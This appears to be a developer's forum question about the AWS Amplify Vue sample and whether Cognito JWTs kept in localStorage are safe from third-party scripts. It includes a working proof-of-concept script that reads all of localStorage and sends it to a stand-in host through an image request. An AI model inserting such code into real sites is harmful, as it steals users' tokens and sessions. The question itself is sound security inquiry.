I'm working through the aws-samples/aws-amplify-vue sample that uses aws/aws-amplify. I'm trying to understand how JWT is used with Cognito for authentication and I don't understand how the JWTs I receive after authentication are protected from being exfiltrated and used by any of the third party JavaScript libraries I might be using.
I cloned the example and followed the instructions to get it set up. Then I modified index.html to include an extra <script>:
<script src="https://example.com/list-localstorage.js"></script>
Then I host list-localstorage.js on example.com. The contents are:
// Ref: https://stackoverflow.com/a/28306101/624726
// Copy every key/value pair in localStorage into a plain object.
var allStorage = Object.keys(localStorage).reduce(function (obj, key) {
  obj[key] = localStorage.getItem(key);
  return obj;
}, {});
// Ref: https://stackoverflow.com/a/5049668/624726
// Exfiltrate the dump as a GET request: an image load needs no CORS permission.
// encodeURIComponent keeps the JSON intact in the query string.
(new Image()).src = 'https://example.net/log-storage?' + encodeURIComponent(JSON.stringify(allStorage));
When I watch the access logs for example.net, I see my JWTs getting logged. I was able to verify the signature on the id and access tokens.
Would those be usable to access protected content? What are they doing to prevent (ex:) a malicious JavaScript ad from reading all the data in localStorage and stealing and using my JWTs?